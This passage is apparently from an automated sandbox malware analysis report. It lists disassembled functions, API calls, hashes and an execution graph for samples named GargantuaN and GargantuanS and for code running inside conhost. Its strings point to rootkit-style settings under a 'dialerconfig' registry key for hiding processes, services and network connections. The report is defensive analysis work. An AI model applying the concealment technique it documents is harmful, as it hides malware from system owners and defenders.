                                                        • Associated: 00000001.00000002.1645065632.0000000000D8E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000D95000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000DB2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645133407.0000000000DB3000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_d50000_GargantuaN.jbxd
                                                        Similarity
                                                        • API ID: Thread$CreatePriority__vswprintf_c_l
                                                        • String ID: CreateThread failed
                                                        • API String ID: 2655393344-3849766595
                                                        • Opcode ID: 2feda90b20498319e5413f23055a39277e5a745beed55136204a819b62d4c07a
                                                        • Instruction ID: 7782a0cdf734b77a3a5493793c47233b25638e0d1b5fdaeb1441c0315dd7da10
                                                        • Opcode Fuzzy Hash: 2feda90b20498319e5413f23055a39277e5a745beed55136204a819b62d4c07a
                                                        • Instruction Fuzzy Hash: 6C01FE7934434A7FDB305F64DC52B767398EB40751F24042EF946D62C0CAA1A8894734
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00D6E6A3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 49COMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        APIs
                                                        • VirtualQuery.KERNEL32(80000000,00D6E5E8,0000001C,00D6E7DD,00000000,?,?,?,?,?,?,?,00D6E5E8,00000004,00DB1CEC,00D6E86D), ref: 00D6E6B4
                                                        • GetSystemInfo.KERNEL32(?,?,00000000,?,?,?,?,00D6E5E8,00000004,00DB1CEC,00D6E86D), ref: 00D6E6CF
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1645005808.0000000000D51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D50000, based on PE: true
                                                        • Associated: 00000001.00000002.1644982121.0000000000D50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645042455.0000000000D83000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000D8E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000D95000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000DB2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645133407.0000000000DB3000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_d50000_GargantuaN.jbxd
                                                        Similarity
                                                        • API ID: InfoQuerySystemVirtual
                                                        • String ID: D
                                                        • API String ID: 401686933-2746444292
                                                        • Opcode ID: 6a8b7e3b037a7f1b5190702c5202b3d06a6e8b97b743c0a428e78d4aa5e42b7e
                                                        • Instruction ID: 159bd6b090741bca584ba8818d3d371ceb1614d3a55b72d91aef47ec9513a81d
                                                        • Opcode Fuzzy Hash: 6a8b7e3b037a7f1b5190702c5202b3d06a6e8b97b743c0a428e78d4aa5e42b7e
                                                        • Instruction Fuzzy Hash: D4012B766002096BDF14DE29DC09BDD7BAAEFC4724F0CC120ED19DB250E734D90587A0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00D51316 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37COMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 00D5E2E8: _swprintf.LIBCMT ref: 00D5E30E
                                                          • Part of subcall function 00D5E2E8: _strlen.LIBCMT ref: 00D5E32F
                                                          • Part of subcall function 00D5E2E8: SetDlgItemTextW.USER32(?,00D8E274,?), ref: 00D5E38F
                                                          • Part of subcall function 00D5E2E8: GetWindowRect.USER32(?,?), ref: 00D5E3C9
                                                          • Part of subcall function 00D5E2E8: GetClientRect.USER32(?,?), ref: 00D5E3D5
                                                        • GetDlgItem.USER32(00000000,00003021), ref: 00D5135A
                                                        • SetWindowTextW.USER32(00000000,00D835F4), ref: 00D51370
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1645005808.0000000000D51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D50000, based on PE: true
                                                        • Associated: 00000001.00000002.1644982121.0000000000D50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645042455.0000000000D83000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000D8E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000D95000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000DB2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645133407.0000000000DB3000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_d50000_GargantuaN.jbxd
                                                        Similarity
                                                        • API ID: ItemRectTextWindow$Client_strlen_swprintf
                                                        • String ID: 0
                                                        • API String ID: 2622349952-4108050209
                                                        • Opcode ID: 6ec68feb41ef696a10b10b6762d9f1d76e809339e13f0529dff923774870fd7c
                                                        • Instruction ID: 6a5327320e88831f74c23dc2f96b8625f83826edec77ee17353c346bd61ba178
                                                        • Opcode Fuzzy Hash: 6ec68feb41ef696a10b10b6762d9f1d76e809339e13f0529dff923774870fd7c
                                                        • Instruction Fuzzy Hash: B5F04434145388FAEF151F94CC2D7E93B5DAF44386F084254FC4895A91CB75CA99EB70
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00D60FE4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19synchronizationCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • WaitForSingleObject.KERNEL32(?,000000FF,00D61206,?), ref: 00D60FEA
                                                        • GetLastError.KERNEL32(?), ref: 00D60FF6
                                                          • Part of subcall function 00D56C36: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00D56C54
                                                        Strings
                                                        • WaitForMultipleObjects error %d, GetLastError %d, xrefs: 00D60FFF
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1645005808.0000000000D51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D50000, based on PE: true
                                                        • Associated: 00000001.00000002.1644982121.0000000000D50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645042455.0000000000D83000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000D8E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000D95000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000DB2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645133407.0000000000DB3000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_d50000_GargantuaN.jbxd
                                                        Similarity
                                                        • API ID: ErrorLastObjectSingleWait__vswprintf_c_l
                                                        • String ID: WaitForMultipleObjects error %d, GetLastError %d
                                                        • API String ID: 1091760877-2248577382
                                                        • Opcode ID: 56c9c284bebe1c4c3b4725f27c2df953e39e42a02b2b7ee6e9cf68257a199a47
                                                        • Instruction ID: 14fec9285796483baef7cbf163b7e02894ef25b507176802156b6cbc83a4f121
                                                        • Opcode Fuzzy Hash: 56c9c284bebe1c4c3b4725f27c2df953e39e42a02b2b7ee6e9cf68257a199a47
                                                        • Instruction Fuzzy Hash: B4D05E766486317BCF103724AC0AD7E3D08DB22B72BA40714F93DA63E6CA25898557B2
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00D5E29E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 13COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetModuleHandleW.KERNEL32(00000000,?,00D5DA55,?), ref: 00D5E2A3
                                                        • FindResourceW.KERNEL32(00000000,RTL,00000005,?,00D5DA55,?), ref: 00D5E2B1
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1645005808.0000000000D51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D50000, based on PE: true
                                                        • Associated: 00000001.00000002.1644982121.0000000000D50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645042455.0000000000D83000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000D8E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000D95000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000DB2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645133407.0000000000DB3000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_d50000_GargantuaN.jbxd
                                                        Similarity
                                                        • API ID: FindHandleModuleResource
                                                        • String ID: RTL
                                                        • API String ID: 3537982541-834975271
                                                        • Opcode ID: 191629f83c7ea76339d807d240a3ca447e1e384ed30e6a2e5647d28da1bc68c2
                                                        • Instruction ID: 61bffe44e8cac3b0b9a616e4ceff6d6da07e81243c4dd34bf19d3870a1baacda
                                                        • Opcode Fuzzy Hash: 191629f83c7ea76339d807d240a3ca447e1e384ed30e6a2e5647d28da1bc68c2
                                                        • Instruction Fuzzy Hash: 0FC012312547106BEA342B656C0DB476A585B10F11F090448B549E93D1D6A5C54487B0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Executed Functions

                                                        Function 00007FF7A2251140 Relevance: .0, Instructions: 4COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.1745998457.00007FF7A2251000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF7A2250000, based on PE: true
                                                        • Associated: 00000002.00000002.1745972183.00007FF7A2250000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.1746024729.00007FF7A225C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.1746062081.00007FF7A225F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.1746088678.00007FF7A2260000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.1749013316.00007FF7A2754000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.1749161971.00007FF7A278B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.1749217510.00007FF7A278E000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_7ff7a2250000_GargantuanS.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 808f824871d7e1a8eee0a1093264b3d0fd75ff3502bae8c0f48d855cf6986489
                                                        • Instruction ID: b752463fdbaded6aab02adacd278ba5094f211ac24d00a60aa47dfbf79199e27
                                                        • Opcode Fuzzy Hash: 808f824871d7e1a8eee0a1093264b3d0fd75ff3502bae8c0f48d855cf6986489
                                                        • Instruction Fuzzy Hash: 31B0923090620984E2003B11D84126962606B48740F838030C40D023BACAAD9040DB20
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Execution Graph

                                                        Execution Coverage:0.7%
                                                        Dynamic/Decrypted Code Coverage:0%
                                                        Signature Coverage:0%
                                                        Total number of Nodes:73
                                                        Total number of Limit Nodes:2
                                                        execution_graph 14821 1b0bb981abc 14826 1b0bb981628 GetProcessHeap 14821->14826 14823 1b0bb981ad2 Sleep SleepEx 14825 1b0bb981acb 14823->14825 14824 1b0bb981598 StrCmpIW StrCmpW 14824->14825 14825->14823 14825->14824 14827 1b0bb981648 __free_lconv_num 14826->14827 14871 1b0bb981268 GetProcessHeap 14827->14871 14829 1b0bb981650 14830 1b0bb981268 2 API calls 14829->14830 14831 1b0bb981661 14830->14831 14832 1b0bb981268 2 API calls 14831->14832 14833 1b0bb98166a 14832->14833 14834 1b0bb981268 2 API calls 14833->14834 14835 1b0bb981673 14834->14835 14836 1b0bb98168e RegOpenKeyExW 14835->14836 14837 1b0bb9816c0 RegOpenKeyExW 14836->14837 14838 1b0bb9818a6 14836->14838 14839 1b0bb9816e9 14837->14839 14840 1b0bb9816ff RegOpenKeyExW 14837->14840 14838->14825 14875 1b0bb9812bc RegQueryInfoKeyW 14839->14875 14841 1b0bb98173a RegOpenKeyExW 14840->14841 14842 1b0bb981723 14840->14842 14846 1b0bb98175e 14841->14846 14847 1b0bb981775 RegOpenKeyExW 14841->14847 14886 1b0bb98104c RegQueryInfoKeyW 14842->14886 14849 1b0bb9812bc 13 API calls 14846->14849 14850 1b0bb981799 14847->14850 14851 1b0bb9817b0 RegOpenKeyExW 14847->14851 14852 1b0bb98176b RegCloseKey 14849->14852 14853 1b0bb9812bc 13 API calls 14850->14853 14854 1b0bb9817eb RegOpenKeyExW 14851->14854 14855 1b0bb9817d4 14851->14855 14852->14847 14858 1b0bb9817a6 RegCloseKey 14853->14858 14856 1b0bb98180f 14854->14856 14857 1b0bb981826 RegOpenKeyExW 14854->14857 14859 1b0bb9812bc 13 API calls 14855->14859 14861 1b0bb98104c 5 API calls 14856->14861 14862 1b0bb98184a 14857->14862 14863 1b0bb981861 RegOpenKeyExW 14857->14863 14858->14851 14860 1b0bb9817e1 RegCloseKey 14859->14860 14860->14854 14864 1b0bb98181c RegCloseKey 14861->14864 14865 1b0bb98104c 5 API calls 14862->14865 14866 1b0bb98189c RegCloseKey 14863->14866 14867 1b0bb981885 14863->14867 14864->14857 14868 1b0bb981857 RegCloseKey 14865->14868 14866->14838 14869 1b0bb98104c 5 API calls 14867->14869 14868->14863 14870 1b0bb981892 RegCloseKey 14869->14870 14870->14866 14892 1b0bb996168 14871->14892 14873 1b0bb981283 GetProcessHeap 14874 1b0bb9812ae __free_lconv_num 14873->14874 14874->14829 14876 1b0bb98148a RegCloseKey 14875->14876 14877 1b0bb981327 GetProcessHeap 14875->14877 14876->14840 14878 1b0bb98133e __free_lconv_num 14877->14878 14879 1b0bb981352 RegEnumValueW 14878->14879 14880 1b0bb981476 GetProcessHeap HeapFree 14878->14880 14882 1b0bb98141e lstrlenW GetProcessHeap 14878->14882 14883 1b0bb9813d3 GetProcessHeap 14878->14883 14884 1b0bb9813f3 GetProcessHeap HeapFree 14878->14884 14885 1b0bb981443 StrCpyW 14878->14885 14893 1b0bb98152c 14878->14893 14879->14878 14880->14876 14882->14878 14883->14878 14884->14882 14885->14878 14887 1b0bb9810bf __free_lconv_num 14886->14887 14888 1b0bb9811b5 RegCloseKey 14886->14888 14887->14888 14889 1b0bb9810cf RegEnumValueW 14887->14889 14890 1b0bb98114e GetProcessHeap 14887->14890 14891 1b0bb98116e GetProcessHeap HeapFree 14887->14891 14888->14841 14889->14887 14890->14887 14891->14887 14894 1b0bb98157c 14893->14894 14897 1b0bb981546 14893->14897 14894->14878 14895 1b0bb98155d StrCmpIW 14895->14897 14896 1b0bb981565 StrCmpW 14896->14897 14897->14894 14897->14895 14897->14896 14898 1b0bb95273c 14900 1b0bb95276a 14898->14900 14899 1b0bb952858 LoadLibraryA 14899->14900 14900->14899 14901 1b0bb9528d4 14900->14901

                                                        Executed Functions

                                                        Function 000001B0BB98328C Relevance: 4.5, APIs: 3, Instructions: 43threadCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.1766155786.000001B0BB980000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001B0BB980000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_1b0bb980000_conhost.jbxd
                                                        Similarity
                                                        • API ID: Current$FileModuleNameProcessProtectThreadVirtual$CreateFindHandlePath
                                                        • String ID:
                                                        • API String ID: 1683269324-0
                                                        • Opcode ID: c94412c55dcd243bcd3fbe265bea19663896af10ab27123b85acb7154d5eea14
                                                        • Instruction ID: fba99c5a4152627cb9f67f4d25612b5066cae9354f3caab1e197c27b8ec105b9
                                                        • Opcode Fuzzy Hash: c94412c55dcd243bcd3fbe265bea19663896af10ab27123b85acb7154d5eea14
                                                        • Instruction Fuzzy Hash: 3D111B79618E4183FB729B22FF493DB32A4EB5E3C5F90412AB94AC2595EF78C0488610
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 000001B0BB981ABC Relevance: 3.1, APIs: 2, Instructions: 68sleepCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        APIs
                                                          • Part of subcall function 000001B0BB981628: GetProcessHeap.KERNEL32 ref: 000001B0BB981633
                                                          • Part of subcall function 000001B0BB981628: HeapAlloc.KERNEL32 ref: 000001B0BB981642
                                                          • Part of subcall function 000001B0BB981628: RegOpenKeyExW.ADVAPI32 ref: 000001B0BB9816B2
                                                          • Part of subcall function 000001B0BB981628: RegOpenKeyExW.ADVAPI32 ref: 000001B0BB9816DF
                                                          • Part of subcall function 000001B0BB981628: RegCloseKey.ADVAPI32 ref: 000001B0BB9816F9
                                                          • Part of subcall function 000001B0BB981628: RegOpenKeyExW.ADVAPI32 ref: 000001B0BB981719
                                                          • Part of subcall function 000001B0BB981628: RegCloseKey.ADVAPI32 ref: 000001B0BB981734
                                                          • Part of subcall function 000001B0BB981628: RegOpenKeyExW.ADVAPI32 ref: 000001B0BB981754
                                                          • Part of subcall function 000001B0BB981628: RegCloseKey.ADVAPI32 ref: 000001B0BB98176F
                                                          • Part of subcall function 000001B0BB981628: RegOpenKeyExW.ADVAPI32 ref: 000001B0BB98178F
                                                          • Part of subcall function 000001B0BB981628: RegCloseKey.ADVAPI32 ref: 000001B0BB9817AA
                                                          • Part of subcall function 000001B0BB981628: RegOpenKeyExW.ADVAPI32 ref: 000001B0BB9817CA
                                                        • Sleep.KERNEL32 ref: 000001B0BB981AD7
                                                        • SleepEx.KERNEL32 ref: 000001B0BB981ADD
                                                          • Part of subcall function 000001B0BB981628: RegCloseKey.ADVAPI32 ref: 000001B0BB9817E5
                                                          • Part of subcall function 000001B0BB981628: RegOpenKeyExW.ADVAPI32 ref: 000001B0BB981805
                                                          • Part of subcall function 000001B0BB981628: RegCloseKey.ADVAPI32 ref: 000001B0BB981820
                                                          • Part of subcall function 000001B0BB981628: RegOpenKeyExW.ADVAPI32 ref: 000001B0BB981840
                                                          • Part of subcall function 000001B0BB981628: RegCloseKey.ADVAPI32 ref: 000001B0BB98185B
                                                          • Part of subcall function 000001B0BB981628: RegOpenKeyExW.ADVAPI32 ref: 000001B0BB98187B
                                                          • Part of subcall function 000001B0BB981628: RegCloseKey.ADVAPI32 ref: 000001B0BB981896
                                                          • Part of subcall function 000001B0BB981628: RegCloseKey.ADVAPI32 ref: 000001B0BB9818A0
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.1766155786.000001B0BB980000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001B0BB980000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_1b0bb980000_conhost.jbxd
                                                        Similarity
                                                        • API ID: CloseOpen$HeapSleep$AllocProcess
                                                        • String ID:
                                                        • API String ID: 1534210851-0
                                                        • Opcode ID: ad614115fa5d2181ccf7742c52f053f5bbac07b16a2f1961ccdf1ed8f9939afa
                                                        • Instruction ID: 3b332a6565b8913d1a5b94307b60d14a2c7ab3855f27e53c505f5ddf8de1548c
                                                        • Opcode Fuzzy Hash: ad614115fa5d2181ccf7742c52f053f5bbac07b16a2f1961ccdf1ed8f9939afa
                                                        • Instruction Fuzzy Hash: 06316479211E6193EB729B36DF512FB73A5EB8EBD0F0854219E09C76A9FF24C8518210
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 000001B0BB95273C Relevance: 1.7, APIs: 1, Instructions: 187libraryCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.1766119561.000001B0BB950000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001B0BB950000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_1b0bb950000_conhost.jbxd
                                                        Similarity
                                                        • API ID: LibraryLoad
                                                        • String ID:
                                                        • API String ID: 1029625771-0
                                                        • Opcode ID: 8c1c9448f3dd1088c887dafc1273d9eb4da1e6d2ce59199f574756fa2a1f07a1
                                                        • Instruction ID: 1fe10f596d52738d9bbee35dc01af9d6fbec034673a2264c63cd8e1c5355782c
                                                        • Opcode Fuzzy Hash: 8c1c9448f3dd1088c887dafc1273d9eb4da1e6d2ce59199f574756fa2a1f07a1
                                                        • Instruction Fuzzy Hash: 6261F17AB41F9487DB768F1592107AEB3A2F768BA4F188121CF5987789DF38D852C700
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Non-executed Functions

                                                        Function 000001B0BB982B2C Relevance: 14.3, APIs: 5, Strings: 3, Instructions: 264stringlibraryloaderCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 363 1b0bb982b2c-1b0bb982ba5 call 1b0bb9a2ce0 366 1b0bb982bab-1b0bb982bb1 363->366 367 1b0bb982ee0-1b0bb982f03 363->367 366->367 368 1b0bb982bb7-1b0bb982bba 366->368 368->367 369 1b0bb982bc0-1b0bb982bc3 368->369 369->367 370 1b0bb982bc9-1b0bb982bd9 GetModuleHandleA 369->370 371 1b0bb982bdb-1b0bb982beb call 1b0bb996090 370->371 372 1b0bb982bed 370->372 374 1b0bb982bf0-1b0bb982c0e 371->374 372->374 374->367 377 1b0bb982c14-1b0bb982c33 StrCmpNIW 374->377 377->367 378 1b0bb982c39-1b0bb982c3d 377->378 378->367 379 1b0bb982c43-1b0bb982c4d 378->379 379->367 380 1b0bb982c53-1b0bb982c5a 379->380 380->367 381 1b0bb982c60-1b0bb982c73 380->381 382 1b0bb982c83 381->382 383 1b0bb982c75-1b0bb982c81 381->383 384 1b0bb982c86-1b0bb982c8a 382->384 383->384 385 1b0bb982c9a 384->385 386 1b0bb982c8c-1b0bb982c98 384->386 387 1b0bb982c9d-1b0bb982ca7 385->387 386->387 388 1b0bb982d9d-1b0bb982da1 387->388 389 1b0bb982cad-1b0bb982cb0 387->389 390 1b0bb982ed2-1b0bb982eda 388->390 391 1b0bb982da7-1b0bb982daa 388->391 392 1b0bb982cc2-1b0bb982ccc 389->392 393 1b0bb982cb2-1b0bb982cbf call 1b0bb98199c 389->393 390->367 390->381 394 1b0bb982dbb-1b0bb982dc5 391->394 395 1b0bb982dac-1b0bb982db8 call 1b0bb98199c 391->395 397 1b0bb982cce-1b0bb982cdb 392->397 398 1b0bb982d00-1b0bb982d0a 392->398 393->392 400 1b0bb982df5-1b0bb982df8 394->400 401 1b0bb982dc7-1b0bb982dd4 394->401 395->394 397->398 403 1b0bb982cdd-1b0bb982cea 397->403 404 1b0bb982d3a-1b0bb982d3d 398->404 405 1b0bb982d0c-1b0bb982d19 398->405 411 1b0bb982dfa-1b0bb982e03 call 1b0bb981bbc 400->411 412 1b0bb982e05-1b0bb982e12 lstrlenW 400->412 401->400 410 1b0bb982dd6-1b0bb982de3 401->410 413 1b0bb982ced-1b0bb982cf3 403->413 408 1b0bb982d4b-1b0bb982d58 lstrlenW 404->408 409 1b0bb982d3f-1b0bb982d49 call 1b0bb981bbc 404->409 405->404 406 1b0bb982d1b-1b0bb982d28 405->406 414 1b0bb982d2b-1b0bb982d31 406->414 416 1b0bb982d5a-1b0bb982d64 408->416 417 1b0bb982d7b-1b0bb982d8d call 1b0bb983844 408->417 409->408 421 1b0bb982d93-1b0bb982d98 409->421 418 1b0bb982de6-1b0bb982dec 410->418 411->412 430 1b0bb982e4a-1b0bb982e55 411->430 422 1b0bb982e14-1b0bb982e1e 412->422 423 1b0bb982e35-1b0bb982e3f call 1b0bb983844 412->423 420 1b0bb982cf9-1b0bb982cfe 413->420 413->421 414->421 426 1b0bb982d33-1b0bb982d38 414->426 416->417 429 1b0bb982d66-1b0bb982d79 call 1b0bb98152c 416->429 417->421 424 1b0bb982e42-1b0bb982e44 417->424 418->430 431 1b0bb982dee-1b0bb982df3 418->431 420->398 420->413 421->424 422->423 425 1b0bb982e20-1b0bb982e33 call 1b0bb98152c 422->425 423->424 424->390 424->430 425->423 425->430 426->404 426->414 429->417 429->421 436 1b0bb982ecc-1b0bb982ed0 430->436 437 1b0bb982e57-1b0bb982e5b 430->437 431->400 431->418 436->390 441 1b0bb982e5d-1b0bb982e61 437->441 442 1b0bb982e63-1b0bb982e7d call 1b0bb9885c0 437->442 441->442 444 1b0bb982e80-1b0bb982e83 441->444 442->444 447 1b0bb982e85-1b0bb982ea3 call 1b0bb9885c0 444->447 448 1b0bb982ea6-1b0bb982ea9 444->448 447->448 448->436 449 1b0bb982eab-1b0bb982ec9 call 1b0bb9885c0 448->449 449->436
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.1766155786.000001B0BB980000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001B0BB980000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_1b0bb980000_conhost.jbxd
                                                        Similarity
                                                        • API ID: lstrlen$FileHandleModuleName$AddressCloseFindOpenPathProcProcess
                                                        • String ID: NtQueryObject$\Device\Nsi$ntdll.dll
                                                        • API String ID: 2119608203-3850299575
                                                        • Opcode ID: 9c3d18d3d08cd52b53439cd9635d78b514e0dbb1c6aaf52094b9259375ebc022
                                                        • Instruction ID: 00590ddf17dc58f79e30d81a4be9f7a403ff98a1a212a6f06faacbb71db4adcb
                                                        • Opcode Fuzzy Hash: 9c3d18d3d08cd52b53439cd9635d78b514e0dbb1c6aaf52094b9259375ebc022
                                                        • Instruction Fuzzy Hash: E1B18C7A210E5087EBB68F25DA407EA77A5FB4ABC4F44502AEE4997795EF35CC80C340
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 000001B0BB987D90 Relevance: 10.6, APIs: 7, Instructions: 72COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.1766155786.000001B0BB980000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001B0BB980000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_1b0bb980000_conhost.jbxd
                                                        Similarity
                                                        • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                        • String ID:
                                                        • API String ID: 3140674995-0
                                                        • Opcode ID: 781d1b9bde8934adc12bfa83d35ad1be64d2520f1bd2f9e02f1b4bb1ea1a0257
                                                        • Instruction ID: 2849dc2059eb21b50b3bc8f00e547e449bff6682774550356ac8cedf2aa706f6
                                                        • Opcode Fuzzy Hash: 781d1b9bde8934adc12bfa83d35ad1be64d2520f1bd2f9e02f1b4bb1ea1a0257
                                                        • Instruction Fuzzy Hash: C3314F76215F808AEB719F60E8807EE7365F789784F44442ADA8D97B99EF38C548C710
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 000001B0BB98D2A4 Relevance: 9.1, APIs: 6, Instructions: 83COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.1766155786.000001B0BB980000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001B0BB980000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_1b0bb980000_conhost.jbxd
                                                        Similarity
                                                        • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                        • String ID:
                                                        • API String ID: 1239891234-0
                                                        • Opcode ID: 056b8809331e045eb0ff6df28b8a67c6be047fb713c0be5e5acd4a9b147221bc
                                                        • Instruction ID: 11ecdf1489101479767b71cb4eb6d33861f8973a45ac2f6809f2e03d499ac284
                                                        • Opcode Fuzzy Hash: 056b8809331e045eb0ff6df28b8a67c6be047fb713c0be5e5acd4a9b147221bc
                                                        • Instruction Fuzzy Hash: FE314C3A214F8097DB61DF25E9803DE73A4F789798F50012AEA9D83B99DF38C555CB00
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 000001B0BB981628 Relevance: 50.9, APIs: 20, Strings: 9, Instructions: 157registrymemoryCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.1766155786.000001B0BB980000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001B0BB980000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_1b0bb980000_conhost.jbxd
                                                        Similarity
                                                        • API ID: Heap$CloseOpen$Process$Alloc$EnumFreeInfoQueryValuelstrlen
                                                        • String ID: SOFTWARE\dialerconfig$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
                                                        • API String ID: 106492572-2879589442
